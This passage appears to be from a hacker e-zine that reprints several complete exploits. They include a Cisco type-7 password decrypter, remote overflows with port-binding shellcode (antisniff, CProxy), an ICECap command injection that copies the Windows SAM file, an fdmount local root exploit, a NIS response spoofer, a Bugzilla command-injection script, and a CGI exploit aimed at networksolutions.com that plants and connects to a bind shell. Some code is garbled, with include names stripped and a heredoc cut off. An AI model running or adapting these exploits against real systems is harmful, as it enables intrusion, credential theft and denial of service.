ciscocrack.c / ciscocrack.pl cisco password cracker. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* * Cisco password decrypter V2.0 * (c) 1995 by SPHiXe * * DISCLAIMER: The author of this program takes no responsibility for * neither direct nor indirect damages caused by this program. * Misuse of this program may lead to serious problems with * your local authorities... * You should know what you're doing. */ #include #include char xlat[] = { 0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44 }; char pw_str1[] = "password 7 "; char pw_str2[] = "enable-password 7 "; char *pname; cdecrypt(enc_pw, dec_pw) char *enc_pw; char *dec_pw; { unsigned int seed, i, val = 0; if(strlen(enc_pw) & 1) return(-1); seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0'; if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1])) return(-1); for (i = 2 ; i <= strlen(enc_pw); i++) { if(i !=2 && !(i & 1)) { dec_pw[i / 2 - 2] = val ^ xlat[seed++]; val = 0; } val *= 16; if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) { val += enc_pw[i] - '0'; continue; } if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') { val += enc_pw[i] - 'A' + 10; continue; } if(strlen(enc_pw) != i) return(-1); } dec_pw[++i / 2] = 0; return(0); } usage() { fprintf(stdout, "Usage: %s -p \n", pname); fprintf(stdout, " %s \n", pname); return(0); } main(argc,argv) int argc; char **argv; { FILE *in = stdin, *out = stdout; char line[257]; char passwd[65]; unsigned int i, pw_pos; pname = argv[0]; if(argc > 1) { if(argc > 3) { usage(); exit(1); } if(argv[1][0] == '-') { switch(argv[1][1]) { case 'h': usage(); break; case 'p': if(cdecrypt(argv[2], passwd)) { fprintf(stderr, "Error.\n"); exit(1); } fprintf(stdout, "password: %s\n", passwd); break; default: fprintf(stderr, "%s: unknow option.", pname); } return(0); } if((in = fopen(argv[1], "rt")) == NULL) exit(1); if(argc > 2) if((out = fopen(argv[2], "wt")) == NULL) exit(1); } while(1) { for(i = 0; i < 256; i++) { if((line[i] = fgetc(in)) == EOF) { if(i) break; fclose(in); fclose(out); return(0); } if(line[i] == '\r') i--; if(line[i] == '\n') break; } pw_pos = 0; line[i] = 0; if(!strncmp(line, pw_str1, strlen(pw_str1))) pw_pos = strlen(pw_str1); if(!strncmp(line, pw_str2, strlen(pw_str2))) pw_pos = strlen(pw_str2); if(!pw_pos) { fprintf(stdout, "%s\n", line); continue; } if(cdecrypt(&line[pw_pos], passwd)) { fprintf(stderr, "Error.\n"); exit(1); } else { if(pw_pos == strlen(pw_str1)) fprintf(out, "%s", pw_str1); else fprintf(out, "%s", pw_str2); fprintf(out, "%s\n", passwd); } } } /* www.hack.co.za [19 May]*/ -=- #! /bin/sh ## Decrypts cisco "encrypted" passwords. Feed this confg files as stdin. ## Anything that looks like a "type 7 encrypted" string gets decrypted. ## This should really be a C program, but is presented as a script just to ## piss off a certain group of people. One beer, please... while read xx ; do case "$xx" in *d\ 7\ [01]??* ) ;; *) continue ;; esac DEC=`echo "$xx" | sed -e 's/.* //' -e 's/\(^..\).*/\1/'` DP1=`expr $DEC + 1` HEX=`echo "$xx" | sed -e 's/.* //' -e 's/^..\(..*\)/\1/'` echo 'dsfd;kfoA,.iyewrkldJKDHSUB' | cut -c "${DP1}-30" > /tmp/cis$$.pad echo '#' > /tmp/cis$$.in for xx in 1-2 3-4 5-6 7-8 9-10 11-12 13-14 15-16 17-18 19-20 21-22 ; do echo "${HEX}" | cut -c $xx | sed -e '/^$/q' -e 's/^/0x/' >> /tmp/cis$$.in done echo -n "${DEC}${HEX}: " data -g < /tmp/cis$$.in | xor /tmp/cis$$.pad echo '' done rm -f /tmp/cis$$.pad /tmp/cis$$.in exit 0 # Discussion: # When "service password-encryption" is configured into a cisco router and # the configuration subsequently viewed, the passwords are no longer printed # as plaintext but as strings of randomish-looking garbage. Analysis of # several samples reveals the scrambling algorithm to be trivially weak. # Dr. Delete derived and published an analysis and decryption program some # time ago, but since that didn't seem to be generally available at the time # I went looking for it, here is an independent explanation. This was worked # out on PAPER over a plate of nachos in a hotel bar in downtown LA, but # still illustrates where a general-purpose "xor" handler can be useful for # quickly cracking lame "proprietary" algorithms of this genre. # Passwords can be up to eleven mixed-case characters. In the "encrypted" # representation, the first two bytes of the long string are a random decimal # offset between 0 and 15 into a magic block of characters, and the remaining # bytes are ascii-hex representations of the password bytes xored against # the character-block bytes from the given offset on down. The character # block is "dsfd;kfoA,.iyewrkldJKDHSUB", which is enough for a maximum-length # password at the maximum offset. # Another character block consisting of "sgvca69834ncxv9873254k;fg87" is # located after the first one in the IOS image, which may be relevant to # something else and is simply mentioned here for posterity. It is also # interesting to note that the strings "%02d" and "%02x" occur immediately # afterward, which in light of the above is another clue. # _H* 960315 # www.hack.co.za [14 May]# @HWA 256.0 [IND] l0phtl0phe-kid.c remote linux misc overflow by scut/teso. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://teso.scene.at/%20 /* l0phtl0phe-kid.c - antisniff exploit (1-1-1 "second fixed version" included) * * -scut/teso * * gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines` * * description: * l0pht messed up the fix for their problem in antisniff by not regarding * the type signedness properties of the char and int values used. this * results in a cool method bypassing the too extra checks (length + strncat). * some work on this topic have been done by mixter, (bad results on type * casting), but it should be obvious to any security conscious programmers. * i'm not stating that they aren't allowed errors, but they should fix it * for sure if they're going to fix it at all. -sc. * * 2nd version: script kiddie proof to avoid that "doesn't work" lamer claim. * * greetings to all teso, lam3rz, hert, adm, w00w00 and lsd ppl. */ #include #include #include #include #include #define OFFSET 0xbffef9a0 unsigned int build_xp (unsigned char *xp); int main (int argc, char *argv[]) { int sock; /* raw socket */ u_long src_ip, dst_ip; unsigned char xpbuf[1024]; /* this one gets complicated now */ unsigned char tpack[2048]; /* paket buffer */ unsigned int pl_len; if (argc != 3) { printf ("usage: %s \n\n", argv[0]); exit (EXIT_FAILURE); } sock = libnet_open_raw_sock (IPPROTO_RAW); if (sock == -1) { perror ("libnet_open_raw_sock"); exit (EXIT_FAILURE); } src_ip = libnet_name_resolve (argv[1], 0); dst_ip = libnet_name_resolve (argv[2], 0); pl_len = build_xp (xpbuf); libnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP, src_ip, dst_ip, NULL, 0, tpack); libnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0, tpack + IP_H); libnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0, xpbuf, pl_len, tpack + IP_H + UDP_H); libnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len); /* they use "udp and dst port 53" as bpf, so we should have no problem */ libnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len); libnet_close_raw_sock (sock); printf ("exploitation succeeded.\n"); printf ("try: \"telnet %s 17664\" now.\n", argv[2]); exit (EXIT_SUCCESS); } /* build_xp * * build exploit buffer into buffer pointed to by `xp'. */ unsigned int build_xp (unsigned char *xp) { int i; unsigned char buf[1024]; unsigned char shellcode[] = /* portshell 17644 portshellcode by smiler & scut */ "\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x06\x31\xc0" "\xfe\xc0\xcd\x80\xeb\x76\x5f\x89\x4f\x10\xfe\xc1" "\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f\x08\xfe" "\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66" "\x89\x5f\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16" "\x89\x57\x18\x8d\x4f\x14\x89\x4f\x0c\x8d\x4f\x08" "\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe\xc3\xb0" "\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0" "\x66\xcd\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe" "\xc1\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\x31" "\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d\x4f\x0c" "\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8" "\x7e\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; unsigned char head[] = "\x07-7350-\x00\xfe"; memcpy (buf, head, 9); for (i = 9 ; i < (sizeof (buf) - strlen (shellcode)) ; ++i) buf[i] = '\x90'; memcpy (buf + sizeof (buf) - strlen (shellcode), shellcode, strlen (shellcode)); buf[272] = '\xeb'; buf[273] = '\x08'; buf[274] = (OFFSET ) & 0xff; buf[275] = (OFFSET >> 8) & 0xff; buf[276] = (OFFSET >> 16) & 0xff; buf[277] = (OFFSET >> 24) & 0xff; memcpy (xp, buf, sizeof (buf)); return (sizeof (buf));; } /* www.hack.co.za [19 May]*/ @HWA 257.0 [IND] RFPickaxe.pl winnt remote exploit. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl # # RFPickaxe.pl - demo exploit for default ICECap login/alerts # Disclaimer: I do not provide technical support for my exploits! # # Sorry, this requires Unix, due to the `date` call $|=1; use Socket; ############################################################### # IP of ICECap system (assumes port 8082) $Target="10.10.200.4"; # account info - uses default 'iceman' w/ no password $account="iceman"; $httpauth="aWNlbWFuOiUzQjclQzYlRkU="; #-------- attributes of the alert ---------- $id="100005"; $issue_name="Exploit"; $sev="1"; # spoof these $target="0.0.0.8"; $target_dns="some.host.com"; $det_ip="0.0.0.8"; $det_nbn="SENSOR"; $int_ip="255.255.255.255"; $param="Pickaxe"; # either fake the MAC, or use it to run commands via JET vulnerability #$det_mac="0000000000000"; $det_mac="|shell(\"cmd /c copy c:\\winnt\\repair\\sam._ ". "c:\\progra~1\\networ~1\\icecap\\spatch\\en\\sam.exe \")|"; ############################################################## $inet=inet_aton($Target); $time=`date -u "+%Y-%m-%d %T"`; $time=~s/ /%20/g; $time=~s/:/%3a/g; #path is \program files\network ice\icecap\spatch\en $alert="accountName=$account&issueID=$id&issueName=$issue_name". "&severity=$sev&targetNetAddress=$target&targetDNSName=". "$target_dns&detectorNetAddress=$det_ip&detectorNetBIOS". "Name=$det_nbn&detectorMacAddress=$det_mac&". "intruderNetAddress=$int_ip&detectorType=3&startTime=". "$time¶meter=$param\r\n"; $len=length($alert); @DXX=(); $send=<; select(STDOUT); close(S); alarm(0); return; } else { die("not responding"); } alarm(0);}; if ($@) { if ($@ =~ /timeout/){ die("Timed out!\n");}}} # www.hack.co.za [18 May]# @HWA 258.0 [IND] cproxy.c winnt remote dos attack by |[TDP]|. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ tdp@psynet.net /* * Remote Denial of Service for CProxy v3.3 - Service Pack 2 * * (C) |[TDP]| - HaCk-13 TeaM - 2000 * * * This program xploits an overflow vulnerability in CProxy 3.3 SP2 * HTTP Service (8080), causing server shutdown * * Greetings to all the other members and all my friends :) */ #include #include #include #include #include #include #include #include #define BUFFERSIZE 247 #define NOP 0x90 // If you change this values you can change EIP and EBP values // to redirect to a code that you want >;) #define EIP 0x61616161 #define EBP 0x61616161 void usage(char *progname) { fprintf(stderr,"Usage: %s [eip] [ebp]\n",progname); exit(1); } int main(int argc, char **argv) { char *ptr,buffer[BUFFERSIZE], remotedos[1024]; unsigned long *long_ptr,eip=EIP, ebp=EBP; int aux,sock; struct sockaddr_in sin; unsigned long ip; struct hostent *he; fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n"); if (argc<2) usage(argv[0]); if (argc>=3) eip+=atol(argv[2]); if (argc>=4) ebp+=atol(argv[3]); ptr=buffer; memset(ptr,0,sizeof(buffer)); memset(ptr,NOP,sizeof(buffer)-8); ptr+=sizeof(buffer)-8; long_ptr=(unsigned long*)ptr; *(long_ptr++) = ebp; *(long_ptr++) = eip; ptr=(char *)long_ptr; *ptr='\0'; bzero(remotedos, sizeof(remotedos)); snprintf(remotedos, sizeof(remotedos), "GET http://%s HTTP/1.0\r\n\r\n\r\n",buffer); if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("socket()"); return -1; } if ((he = gethostbyname(argv[1])) != NULL) { ip = *(unsigned long *)he->h_addr; } else { if ((ip = inet_addr(argv[1])) == NULL) { perror("inet_addr()"); return -1; } } sin.sin_family = AF_INET; sin.sin_addr.s_addr = ip; sin.sin_port = htons(8080); fprintf(stderr,"\nEngaged...\n"); if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) { perror("connect()"); return -1; } if (write(sock, remotedos, strlen(remotedos)) < strlen(remotedos)) { perror("write()"); return -1; } fprintf(stderr,"Bye Bye baby!...\n\n"); if (close(sock) < 0) { perror("close()"); return -1; } return(0); } /* www.hack.co.za [18 May]*/ @HWA 259.0 [IND] fdmnt-smash2.c slackware 7.0 local exploit by Scrippie. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ronald@grafix.nl /* Welcome dear reader - be it scriptkiddy, whose sole intent it is to destroy precious old Unix boxes or Assembly Wizard whose sole intent it is to correct my code and send me a flame. The fdutils package contains a setuid root file that is used by the floppy group to mount and unmount floppies. If you are not in this group, this exploit will not work. This thingy was tested on Slackware 4.0 and 7.0 Use as: fdmount-exp [offset] [buf size] [valid text ptr] Since the char * text is overwritten in void errmsg(char *text) we should make sure that this points to a valid address (something in the .data section should do perfectly). The hard coded one used works on my box, to find the one you need use something like: objdump --disassemble-all $(whereis -b fdmount) | grep \<.data\> \ cut -d " " -f1 The HUGE number of nops is needed to make sure this exploit works. Since it Segfaults out of existence without removing /etc/mtab~ we only get one try... Take care with your newly aquired EUID 0! Cheers go out to: #phreak.nl #b0f #hit2000 #root66 The year 2000 scriptkiddie award goed to: Gerrie Mansur Love goes out to: Hester, Maja (you're so cute!), Dopey -- Yours truly, Scrippie - ronald@grafix.nl - buffer0verfl0w security - #phreak.nl */ #include #define NUM_NOPS 500 // Gee, Aleph1 his shellcode is back once more char shellcode[] = "\x31\xc0\xb0\x17\x31\xdb\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } main(int argc, char **argv) { int buf_size = 71; int offset=0, i; char *overflow; char *ovoff; long addr, ptr=0x0804c7d0; if(argc>1) offset = atoi(argv[1]); if(argc>2) buf_size = atoi(argv[2]); if(argc>3) ptr = strtol(argv[3], (char **) NULL, 16); printf("##############################################\n"); printf("# fdmount Slack 4/7 exploit - by Scrippie #\n"); printf("##############################################\n"); printf("Using offset: %d\n", offset); printf("Using buffer size: %d\n", buf_size); printf("Using 0x%x for \"void errmsg(char *text,...)\" char *text\n", ptr); if(!(overflow = (char *)malloc(buf_size+16+NUM_NOPS+strlen(shellcode)))) { fprintf(stderr, "Outta memory - barging out\n"); exit(-1); } overflow[0] = '/'; for(i=1;i #include #include #include #include #include #ifdef __OpenBSD__ #include #include struct pcap { int fd; /* Who cares what else is in there? */ }; #endif /* __OpenBSD__ */ /* This simulates the {old|new} pcap_immediate() function. It may not do * anything on some platforms. */ int my_pcap_immediate(pcap_t *p) { /* Thanks to Michael T. Stolarchuk for the bit to do this and * lots of other info besides. */ #ifdef __OpenBSD__ unsigned int value=1; struct pcap *sp=(struct pcap*)p; /* I don't know that this jives with what pcap_immediate() is * supposed to return, but the pcap man page only specifies that * error == -1 */ return ioctl(sp->fd,BIOCIMMEDIATE,&value); #else return -1; #endif /* __OpenBSD__ */ } /* I'm making this stuff up. I don't actually *know* the NIS protocol, * just what I get on a packet dump. */ /* Assume 32 bit arch... */ struct nisquery_st { u_int serial; char dragons[36]; /* I see 86a4 in all the dragons, even on Linux. I wonder what that's about. */ u_int dom_len; char domainname[1024]; u_int map_len; char mapname[1024]; u_int key_len; char key[1024]; }; /* More guesswork */ char voodoo[]={ 0,0, 0,1,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0, 0,0,0,0,0,1}; struct nisresponse_st { u_int serial; char magic[sizeof(voodoo)]; u_int resp_len; char resp[1024]; }; #define MAC_HEADER_LEN 14 #define PACKET_SIZE 4096 #define PROMISC 1 /***************/ /* Global Vars */ /***************/ struct nisquery_st nq; struct nisresponse_st nr; pcap_t *sniffer; u_short port=0; char hostname[64],etherdev[64],key[64],map[64],domain[64]; u_char *ippacket; int rawsock; /***************/ /***************/ /***************/ void usage(FILE *out,char *name) { fprintf(out,"Usage %s -h -p -r -i " "-k -m -d \n",name); } void set_options(int argc,char **argv) { char ch; while((ch=getopt(argc, argv, "p:h:r:i:m:d:k:"))!=-1) { switch(ch) { case 'm': strncpy(map,optarg,sizeof(map)); map[sizeof(map)-1]=0; break; case 'd': strncpy(domain,optarg,sizeof(domain)); domain[sizeof(domain)-1]=0; break; case 'k': strncpy(key,optarg,sizeof(key)); key[sizeof(key)-1]=0; break; case 'p': port=atoi(optarg); break; case 'h': strncpy(hostname,optarg,sizeof(hostname)); hostname[sizeof(hostname)-1]=0; break; case 'i': strncpy(etherdev,optarg,sizeof(etherdev)); etherdev[sizeof(etherdev)-1]=0; break; case 'r': strncpy(nr.resp,optarg,sizeof(nr.resp)); nr.resp[sizeof(nr.resp)]=0; nr.resp_len=strlen(nr.resp); nr.resp_len=htonl(nr.resp_len); break; case '?': default: usage(stderr,argv[0]); exit(1); } } } /* int open_rawsock(void) { int rawsock,val=1; if((rawsock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) { perror("socket"); exit(1); } if(setsockopt(rawsock,IPPROTO_IP,IP_HDRINCL,&val,sizeof(val))<0) { perror("setsockopt"); exit(1); } return rawsock; } */ int open_rawsock(void) { int rawsock; if(libnet_init_packet(PACKET_SIZE,&ippacket)==-1) { perror("libnet_init_packet"); exit(1); } if((rawsock=libnet_open_raw_sock(IPPROTO_RAW))==-1) { perror("libnet_open_raw_sock"); exit(1); } return rawsock; } pcap_t *open_sniffer(void) { char filterstr[1024],errbuf[4096]; pcap_t *capdev; struct bpf_program filter; int localnet=0,netmask=0; sprintf(filterstr,"dst host %s and udp and dst port %d",hostname,port); printf("Filter: \"%s\"\n",filterstr); if((capdev=pcap_open_live(etherdev,PACKET_SIZE,PROMISC,1,errbuf))==NULL) { fprintf(stderr,"pcap_open_live: %s\n",errbuf); exit(1); } if(pcap_lookupnet(etherdev,&localnet,&netmask,errbuf)) { fprintf(stderr,"pcap_lookupnet: %s\n",errbuf); exit(1); } if(pcap_compile(capdev,&filter,filterstr,1,netmask)) { pcap_perror(capdev,"pcap_compile"); exit(1); } if(pcap_setfilter(capdev,&filter)) { pcap_perror(capdev,"pcap_setfilter"); exit(1); } my_pcap_immediate(capdev); return capdev; } /* Send a response to buf */ void send_response(char *buf,int len) { int i; u_char ihl=4*(0xF&(u_char)buf[MAC_HEADER_LEN]); u_char scratch[4]; u_short tlen,rlen,payload_len; buf+=MAC_HEADER_LEN; rlen=0xFFFF&(ntohl(nr.resp_len) + ((ntohl(nr.resp_len)%4)?4-(ntohl(nr.resp_len)%4):0)); bzero(ippacket,sizeof(ippacket)); nr.serial=nq.serial; bcopy(buf,ippacket,len); /* printf("##############################################\n"); */ payload_len=sizeof(nr)-sizeof(nr.resp)+rlen; bcopy(&nr,ippacket+len,payload_len); tlen=len+payload_len; /* for(i=0;i\\\|\'\`])/sprintf("%%%x",ord($1))/ge; $url =~ s/\ /+/g; $url =~s/\//\/.\//g; return $url; } #end of stolen stuff ($complete_url, $Bugzilla_login, $Bugzilla_password, $command) = (@ARGV); print("Exploit for Bugzilla up to version 2.8\n"); print(" by {} - karin\@root66.nl.eu.org\n"); print("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"); print("RooT66 - http://root66.nl.eu.org\n"); print("ShellOracle - http://www.shelloracle.cjb.net\n"); print("b0f - http://b0f.freebsd.lublin.pl\n"); print("\n"); if ($complete_url eq "-h" || $complete_url eq "--help") { print("Usage: $0 url emailaddress password command\n"); exit; } # Get information of user if (!$complete_url) { print("URL: "); $complete_url = ; chomp($complete_url); $complete_url =~ s/http:\/\///; } if (!$Bugzilla_login) { print("EMAIL: "); $Bugzilla_login = ; chomp($Bugzilla_login); } if (!$Bugzilla_password) { print("PASSWORD: "); $Bugzilla_password = ; chomp($Bugzilla_password); } if (!$command) { print("COMMAND: "); $command = ; chomp($command); } # Set some variables $host = $complete_url; $host =~ s/\/.*//; $base_dir = $complete_url; $base_dir =~ s/^$host//; $base_dir =~ s/[a-zA-Z.]*$//; # Make own directory system("mkdir $$"); print("Getting information needed to submit our 'bug'\n"); # Get product name system("cd $$; lynx -source \"http://$host/" . antiIDS("$base_dir/enter_bug.cgi") . "?Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password") . "\" > enter_bug.cgi"); open(FILE, "< $$/enter_bug.cgi"); while($input = ) { if ($input =~ /enter_bug.cgi\?product=/) { chomp($input); $product = $input; $product =~ s/.*product=//; $product =~ s/".*//; if ($product =~ /\&component=/) { $component = $product; $product =~ s/&.*//; # strip component $component =~ s/.*component=//; $component =~ s/".*//; } } } print("\tProduct: $product\n"); if ($component) { print("\tComponent: $component\n"); } # Get more information $page = antiIDS("$base_dir/enter_bug.cgi?") . "product=" . antiIDS("$product") . "&Bugzilla_login=" . antiIDS("$Bugzilla_login") . "&Bugzilla_password=" . antiIDS("$Bugzilla_password"); system("cd $$; lynx -dump \"http://$host/$page\" > enter_bug.cgi"); open(FILE, "< $$/enter_bug.cgi"); while($input = ) { chomp($input); if ($input =~ /Reporter:/) { $reporter = $input; $reporter =~ s/.*Reporter: //; $reporter =~ s/\ .*//; } if ($input =~ /Version:/) { $version = $input; $version =~ s/.*Version: \[//; $version =~ s/\.*\].*//; } if ($input =~ /Component:/) { $component = $input; $component =~ s/.*Component: \[//; $component =~ s/\.*\].*//; } if ($input =~ /Platform:/) { $platform = $input; $platform =~ s/.*Platform: \[//; $platform =~ s/\.*\].*//; } if ($input =~ /OS:/) { $os = $input; $os =~ s/.*OS: \[//; $os =~ s/\.*\].*//; } if ($input =~ /Priority:/) { $priority = $input; $priority =~ s/.*Priority: \[//; $priority =~ s/\].*//; } if ($input =~ /Severity:/) { $severity = $input; $severity =~ s/.*Severity: \[//; $severity =~ s/\.*\].*//; } } print("\tReporter: $reporter\n"); print("\tVersion: $version\n"); print("\tComponent: $component\n"); print("\tPlatform: $platform\n"); print("\tOS: $os\n"); print("\tPriority: $priority\n"); print("\tSeverity: $severity\n"); close(FILE); #liftoff print("Sending evil bug report\n"); $page = antiIDS("$base_dir/process_bug.cgi") . "?bug_status=" . antiIDS("NEW") . "&reporter=" . antiIDS($reporter) . "&product=" . antiIDS("$product") . "&version=" . antiIDS("$version") . "&component=" . antiIDS("$component") . "&rep_platform=" . antiIDS("$platform") . "&op_sys=" . antiIDS($os) . "&priority=" . antiIDS($priority) . "&bug_severity=" . antiIDS($severity) . "&who=". antiIDS("blaat\@blaat.com;echo \\START OUTPUT COMMAND;$command;echo \\<\\/pre\\>END OUTPUT COMMAND;") . "&knob=" . antiIDS("duplicate") . "&dup_id=" . antiIDS("202021234123412341234") . "&Bugzilla_login=" . antiIDS($Bugzilla_login) . "&Bugzilla_password=" . antiIDS($Bugzilla_password) . "&assigned_to=&cc=&bug_file_loc=&short_desc=&comment=&form_name=enter_bug"; system("cd $$; lynx -dump \"$host/$page\" > enter_bug.cgi"); open(FILE, "< $$/enter_bug.cgi"); while($input = ) { chomp($input); if ($input =~ /END OUTPUT COMMAND/) { $startoutput = 0; } if ($startoutput) { print("$input\n"); } if ($input =~ /START OUTPUT COMMAND/) { $startoutput = 1; } } close(FILE); # Delete shit system("rm -rf $$"); # www.hack.co.za [10 May]# @HWA 262.0 [IND] netsol.c remote cgi exploit by bansh33. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ rishi@felons.org /* * [r00tabega.security.labs] * www.r00tabega.com * Coded for the network solutions exploit (http://packetstorm.securify.com/0005-exploits/netsolbug.txt) * Unfortunately, this no longer works. * coded by bansh33 [rishi@felons.org] * Binds a shell to port 31337 */ #include #include #include #include #include #include #include #include #include #include #define TRUE 0x00000001 #define FALSE 0x00000000 #define ERR 0xffffffff typedef long sock_t; typedef u_long ip_t; typedef u_short port_t; #define H1 "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../x%0aecho%20%27%23%69%6e%63%6c%75%64%65%20%22%2f%75%73%72%2f%69%6e%63%6c%75%64%65%2f%73%79%73%2f%73%6f%63%6b%65%74%2e%68%22%27%20>%20hi.c|" #define H2 "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../x%0aecho%20%27%23%69%6e%63%6c%75%64%65%20%22%2f%75%73%72%2f%69%6e%63%6c%75%64%65%2f%6e%65%74%69%6e%65%74%2f%69%6e%2e%68%22%27>>%20hi.c" #define CODE "GET /cgi-bin/phf?Qalias=x%0aecho%20%27%69%6e%74%20%6d%61%69%6e%28%29%7b%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%5f%69%6e%20%73%61%3b%69%6e%74%20%73%3d%73%6f%63%6b%65%74%28%32%2c%31%2c%30%29%3b%73%61%2e%73%69%6e%5f%61%64%64%72%2e%73%5f%61%64%64%72%3d%30%3b%73%61%2e%73%69%6e%5f%66%61%6d%69%6c%79%3d%32%3b%73%61%2e%73%69%6e%5f%70%6f%72%74%3d%32%37%30%30%32%3b%62%69%6e%64%28%73%2c%28%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%20%2a%29%26%73%61%2c%31%36%29%3b%6c%69%73%74%65%6e%28%73%2c%33%29%3b%77%68%69%6c%65%28%31%29%7b%69%6e%74%20%66%64%3d%61%63%63%65%70%74%28%73%2c%28%73%74%72%75%63%74%20%73%6f%63%6b%61%64%64%72%20%2a%29%26%73%61%2c%31%36%29%3b%64%75%70%32%28%66%64%2c%30%29%3b%64%75%70%32%28%66%64%2c%31%29%3b%64%75%70%32%28%66%64%2c%32%29%3b%73%79%73%74%65%6d%28%22%2f%62%69%6e%2f%62%61%73%68%22%29%3b%7d%7d%27%20>>hi.c|" #define COMPILE "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../%0agcc%20-o%20hi%20hi.c|" #define THEHACK "GET /cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../%0a%2e%2f%68%69%20|" #define WHOAMI "uname -a; id;\n" int main (int, char * *); void simshell (int); void send_tcp_conn (char *, ip_t, port_t, int); sock_t tcp_conn (ip_t, port_t); ip_t resolve (u_char *); int main (int argc, char * * argv) { sock_t fd; ip_t ipaddr; if ((ipaddr = resolve("networksolutions.com")) == ERR) { fprintf(stderr, "Couldn't resolve networksolutions.com.\n"); exit(EXIT_SUCCESS); } fprintf(stderr, "Network Solutions Exploit by bansh33\n"); fprintf(stderr, "i take no responsibility for this\n\n"); fprintf(stderr, "Owning networksolutions.com: "); send_tcp_conn(H1, ipaddr, 80, 0); fprintf(stderr, "."); send_tcp_conn(H2, ipaddr, 80, 0); fprintf(stderr, "."); send_tcp_conn(CODE, ipaddr, 80, 0); fprintf(stderr, "."); send_tcp_conn(COMPILE, ipaddr, 80, 0); fprintf(stderr, "."); send_tcp_conn(THEHACK, ipaddr, 80, 1); fprintf(stderr, "."); fprintf(stderr, "\nDropping you to a shell...\n"); fd = tcp_conn(ipaddr, 31337); send(fd, WHOAMI, strlen(WHOAMI), 0); simshell(fd); } void simshell (int fd) { char buf[255]; fd_set in_set; while (1) { FD_ZERO(&in_set); FD_SET(0, &in_set); FD_SET(fd, &in_set); if ((select(fd + 1, &in_set, 0, 0, NULL))) { if (FD_ISSET(fd, &in_set)) { memset(buf, 0, 255); recv(fd, buf, 255, 0); if (!*buf) exit(EXIT_SUCCESS); fprintf(stderr, buf); } else if (FD_ISSET(0, &in_set)) { memset(buf, 0, 255); read(0, buf, 255); send(fd, buf, strlen(buf), 0); } } } } void send_tcp_conn (char * buf, ip_t ipaddr, port_t port, int dis) { sock_t fd; if ((fd = tcp_conn(ipaddr, port)) > 0) send(fd, buf, strlen(buf), 0); if (!dis) close(fd); } sock_t tcp_conn (ip_t addr, port_t port) { sock_t ret; struct sockaddr_in sa; sa.sin_addr.s_addr = addr; sa.sin_port = htons(port); sa.sin_family = AF_INET; if ((ret = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == ERR) return (ERR); else if ((connect(ret, (struct sockaddr *)&sa, sizeof(struct sockaddr_in))) == ERR) return (ERR); return (ret); } ip_t resolve (u_char * host) { struct in_addr addr; struct hostent * hp; if ((addr.s_addr = inet_addr(host)) == ERR) { if (!(hp = gethostbyname(host))) return (ERR); memcpy(&addr.s_addr, hp->h_addr, hp->h_length); } return (addr.s_addr); } /* EOF */ /* www.hack.co.za [14 May]*/ @HWA 263.0 [IND] napstir.c remote linux misc exploit by S. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ super@udel.edu /* napstir by 